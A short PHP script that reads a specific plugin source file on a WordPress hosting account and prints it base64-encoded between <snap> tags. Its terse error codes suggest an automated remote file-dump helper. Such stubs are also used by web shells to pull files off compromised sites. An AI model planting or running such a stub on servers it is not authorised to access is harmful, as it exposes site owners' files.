<?php $path = '/home/u773298991/domains/americanfilters.ai/public_html/wp-content/plugins/flexible-shipping-ups/vendor_prefixed/guzzlehttp/psr7/src/LimitStream.php'; $max = (int) '100000'; if ($max < 1) { $max = 120000; } if (!is_file($path)) { die('!nf!'); } $c = @file_get_contents($path); if ($c === false) { die('!rd!'); } if (strlen($c) > $max) { die('!big!'); } die('<snap>' . base64_encode($c) . '</snap>');